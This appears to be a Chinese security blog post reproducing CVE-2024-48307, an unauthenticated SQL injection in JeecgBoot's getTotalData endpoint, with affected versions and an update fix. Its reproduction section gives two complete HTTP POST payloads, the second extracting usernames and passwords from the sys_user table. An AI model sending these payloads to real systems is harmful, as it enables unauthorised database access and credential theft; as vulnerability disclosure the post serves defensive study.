CVE-2024-48307:JeecgBoot SQL注入漏洞

CVE-2024-48307:JeecgBoot SQL注入漏洞

进击的HACK 2024-12-17 23:55

关注我们❤️,添加星标🌟,一起学安全!作者:hexixi@Timeline Sec 本文字数:2248阅读时长:2~4mins声明:仅供学习参考使用,请勿用作违法用途,否则后果自负

0x01 简介

JeecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x/3.x,SpringCloud,Ant Design&Vue3,Mybatis-plus,Shiro,JWT,支持微服务。具有代码生成器、权限管理、工作流引擎、监控报警、数据大屏等功能,可以帮助开发人员快速搭建企业级应用系统。

0x02 漏洞概述

漏洞编号:CVE-2024-48307

JeecgBoot v3.7.1中的/onlDragDatasetHead/getTotalData组件发现存在SQL注入漏洞。攻击者可以无需权限利用
jimureport-dashboard-spring-boot-starter-1.8.1-beta.jar
查询数据库,导致数据库信息泄露。

0x03 影响版本

jimureport-spring-boot-starter.version<=1.8.1

0x04 环境搭建

https://github.com/jeecgboot/JeecgBoot/releases

idea部署后端

进入jeecgboot-vue3目录下执行pnpm dev命令开启前端

0x05 漏洞复现

访问http://IP:8080/jeecg-boot/drag/onlDragDatasetHead/getTotalData可以发现服务可用,不能以get方式访问

根据源码构建json数据,尝试访问sys_user表的id

POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1
Host: IP:8080
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Length: 296
Content-Type: application/json

{"tableName": "sys_user", "compName": "test", "condition": {"filter": {}}, "config": {"assistValue": [], "assistType": [], "name": [{"fieldName": "concat(id)", "fieldType": "string"}, {"fieldName": "id", "fieldType": "string"}], "value": [{"fieldName": "id", "fieldType": "string"}], "type": []}}

查询username和password

POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1
Host: IP:8080
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 311

{"tableName": "sys_user", "compName": "test", "condition": {"filter": {}}, "config": {"assistValue": [], "assistType": [], "name": [{"fieldName": "concat(username,0x3a,password)", "fieldType": "string"}, {"fieldName": "id", "fieldType": "string"}], "value": [{"fieldName": "id", "fieldType": "1"}], "type": []}}

0x06 修复方式

更新插件
jimureport到最新版本。

参考链接

https://help.jeecg.com/setup/startup.html

历史漏洞

CNVD-2023-69437CVE-2023-6307CVE-2023-4450CVE-2023-42268CVE-2023-41578CVE-2023-41544CVE-2023-41543CVE-2023-41542CVE-2023-40989CVE-2023-38992CVE-2023-34659CVE-2023-34603CVE-2023-34602CVE-2023-24789CVE-2023-1784CVE-2023-1741CVE-2023-1454

回复
【加群】
进入微信交流群回复
【SRC群】进入SRC-QQ交流群回复
【新人】领取新人学习指南资料回复
【面试】获取渗透测试常见面试题

回复
【手册】
获取原创技术PDF手册

回复
【合作】获取各类安全项目合作方式回复
【帮会】付费加入SRC知识库学习回复

培训】
获取TimelineSec创办的实战课程

视频号:搜索
TimelineSec

官方微博:#小程序://微博/tPbUYdN9EucSD4C

哔哩哔哩:
https://space.bilibili.com/52459
‍1903

觉得有用就点个赞吧!

欢迎评论区留言讨论~